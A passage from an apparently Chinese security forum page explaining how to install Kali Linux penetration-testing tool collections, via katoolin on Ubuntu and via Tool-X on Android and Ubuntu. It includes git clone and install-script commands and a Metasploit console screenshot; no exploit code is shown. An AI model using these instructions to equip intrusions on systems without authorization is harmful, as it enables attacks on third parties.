href="http://image.3001.net/images/20171205/15124235452417.jpg" rel="external nofollow" target="_blank" style="color: rgb(0, 0, 0);"><img src="http://image.3001.net/images/20171205/15124235452417.jpg!small" alt="5a010b53801b7.jpg" width="690" data-original="http://image.3001.net/images/20171205/15124235452417.jpg!small" style="border-width: 0px; border-style: initial; max-width: 660px; height: auto; width: auto; max-height: 100%;"></a></p><p style="margin: 10px auto; text-align: justify;">再输入1添加软件源完成后输入2更新源,输入back返回上级或gohome返回主页</p><p style="margin: 10px auto; text-align: justify;">接下来在主界面选择2 View Categories</p><p style="margin: 10px auto; text-align: justify;"><a class="highslide-image" href="http://image.3001.net/images/20171205/15124236598049.jpg" rel="external nofollow" target="_blank" style="color: rgb(0, 0, 0);"><img src="http://image.3001.net/images/20171205/15124236598049.jpg!small" alt="5a010c6b28b9d.jpg" width="690" data-original="http://image.3001.net/images/20171205/15124236598049.jpg!small" style="border-width: 0px; border-style: initial; max-width: 660px; height: auto; width: auto; max-height: 100%;"></a></p><p style="margin: 10px auto; text-align: justify;">输入对应数字查看软件列表并安装,或者直接输入0安装全部工具。</p><p style="margin: 10px auto; text-align: justify;">后面主界面的3和4用来安装菜单这里不做过多介绍。</p><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;">另外注意 执行apt-get update前必须先在katoolin内删除软件源</p></blockquote><p style="margin: 10px auto; text-align: justify;">这样很简单便安装了kali的全部工具集,是不是很方便呢。</p><h2 style="margin-top: 10px; margin-bottom: 10px; font-size: 21px; color: rgb(3, 120, 187); line-height: 3em;">试玩&nbsp;</h2><p style="margin: 10px auto; text-align: justify;">开个msfconsole</p><p style="margin: 10px auto; text-align: justify;"><a class="highslide-image" href="http://image.3001.net/images/20171205/15124237913628.jpg" rel="external nofollow" target="_blank" style="color: rgb(0, 0, 0);"><img src="http://image.3001.net/images/20171205/15124237913628.jpg!small" alt="5a010e1183514.jpg" width="690" data-original="http://image.3001.net/images/20171205/15124237913628.jpg!small" style="border-width: 0px; border-style: initial; max-width: 660px; height: auto; width: auto; max-height: 100%;"></a></p><p style="margin: 10px auto; text-align: justify;">&nbsp;</p><br><br><p style="margin: 10px auto; text-align: justify;">Tool-X是一个由python编写的用于安装kali linux<a href="http://www.52bug.cn/" rel="external nofollow" target="_blank" style="color: rgb(0, 0, 0);">黑客</a>工具的安装程序。在Tool-X的帮助下,你可以任意在Root或非Root的Android设备中安装<a href="http://www.52bug.cn/" rel="external nofollow" target="_blank" style="color: rgb(0, 0, 0);">黑客</a>工具。Tool-X中为我们提供了近251款黑客工具,这些工具可供termux app和GNURoot Debian终端使用,你可以通过单击来安装任何你需要的工具。Tool-X专为Termux和GNURoot Debian终端而设计。现已支持Ubuntu。</p><p style="margin: 10px auto; text-align: justify;"><img src="https://image.3001.net/images/20190119/1547856603_5c426adbbb3c3.jpg!small" alt="Tool-X:在AndroidUbuntu平台安装Kali的各种攻击工具" width="690" data-original="https://image.3001.net/images/20190119/1547856603_5c426adbbb3c3.jpg!small" class="medium-zoom-image" style="border: 0px; max-width: 660px; cursor: zoom-in; height: auto; width: auto; max-height: 100%; transition: transform 0.3s cubic-bezier(0.2, 0, 0.2, 1) 0s !important;"></p><h2 style="margin-top: 10px; margin-bottom: 10px; font-size: 21px; color: rgb(3, 120, 187); line-height: 3em;">如何使用?</h2><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;">输入 0:表示安装所有工具</p><p style="margin: 10px auto; text-align: justify;">输入 1:显示所有可用工具,并通过编号选择想要安装的工具</p><p style="margin: 10px auto; text-align: justify;">输入 2:显示工具类别</p><p style="margin: 10px auto; text-align: justify;">输入 3:用于在termux中安装操作系统</p><p style="margin: 10px auto; text-align: justify;">输入 4:更新Tool-X</p><p style="margin: 10px auto; text-align: justify;">输入 5:关于我们</p><p style="margin: 10px auto; text-align: justify;">输入 x:退出</p></blockquote><p style="margin: 10px auto; text-align: justify;">当前支持系统:</p><blockquote style="margin-top: 10px; margin-bottom: 10px; padding: 5px 15px; background: none; border-top: none; border-right: none; border-bottom: none; border-left: 3px solid rgb(226, 223, 223); border-image: initial; color: rgb(51, 51, 51); min-height: 35px; line-height: 1.6;"><p style="margin: 10px auto; text-align: justify;">Android</p><p style="margin: 10px auto; text-align: justify;">Ubuntu</p></blockquote><h2 style="margin-top: 10px; margin-bottom: 10px; font-size: 21px; color: rgb(3, 120, 187); line-height: 3em;">如何在termux中安装?</h2><p style="margin: 10px auto; text-align: justify;">打开termux app并键入以下命令。</p><pre highlighted="true" style="transition-duration: 0.2s; transition-property: color, opacity; overflow: auto;"><code class="hljs language-sql" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">apt <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">update</span> pkg <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">install</span> git

git <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">clone</span> https://github.com/Rajkumrdusad/Tool-X.git

cd Tool-X

chmod +x install.aex

sh install.aex 如果无法正常执行请键入 ./install.aex</code></pre><p style="margin: 10px auto; text-align: justify;">现在,Tool-X已成功安装。键入Tool-X运行Tool-X。</p><p style="margin: 10px auto; text-align: justify;">现在你可以在终端的任何位置,通过键入Tool-X来打开Tool-X。</p><h2 style="margin-top: 10px; margin-bottom: 10px; font-size: 21px; color: rgb(3, 120, 187); line-height: 3em;">如何在GNURoot Debian终端中安装?</h2><p style="margin: 10px auto; text-align: justify;">打开GNURoot Debian app并输入以下命令。</p><pre highlighted="true" style="transition-duration: 0.2s; transition-property: color, opacity; overflow: auto;"><code class="hljs bash" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;"><span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">cd</span> &amp;&amp; git <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">clone</span> https://github.com/Rajkumrdusad/Tool-X.git <span class="hljs-built_in" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">cd</span> Tool-X

chmod +x install.aex

sh install.aex 如果无法正常执行请键入 ./install.aex</code></pre><p style="margin: 10px auto; text-align: justify;">现在,Tool-X已成功安装。键入Tool-X运行Tool-X。</p><p style="margin: 10px auto; text-align: justify;">现在你可以在终端的任何位置,通过键入Tool-X来打开Tool-X。</p><h2 style="margin-top: 10px; margin-bottom: 10px; font-size: 21px; color: rgb(3, 120, 187); line-height: 3em;">如何在Ubuntu中安装?</h2><pre highlighted="true" style="transition-duration: 0.2s; transition-property: color, opacity; overflow: auto;"><code class="hljs language-sql" style="margin-right: 3px; margin-left: 3px; padding: 5px; font-family: &quot;Courier New&quot;, sans-serif; background: rgb(245, 245, 245); border: 1px solid rgb(204, 204, 204); font-size: 14px; transition-duration: 0.2s; transition-property: color, opacity, border-color; display: block; border-radius: 3px; overflow-x: auto;">sudo apt-get <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">Update</span> sudo apt-<span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">get</span> <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">install</span> git

sudo git <span class="hljs-keyword" style="transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; color: rgb(0, 0, 255);">clone</span> https://github.com/Rajkumrdusad/Tool-X.git

cd Tool-X

chmod +x install.aex

sudo sh install.aex 或 ./install.aex</code></pre><p style="margin: 10px auto; text-align: justify;">现在,Tool-X已成功安装。键入Tool-X运行Tool-X。</p><p style="margin: 10px auto; text-align: justify;">现在你可以在终端的任何位置,通过键入Tool-X来打开Tool-X。最后提醒大家一句,请勿将该工具用于任何非法目的</p></div>
页: [1]
查看完整版本: kali linux 入侵window实例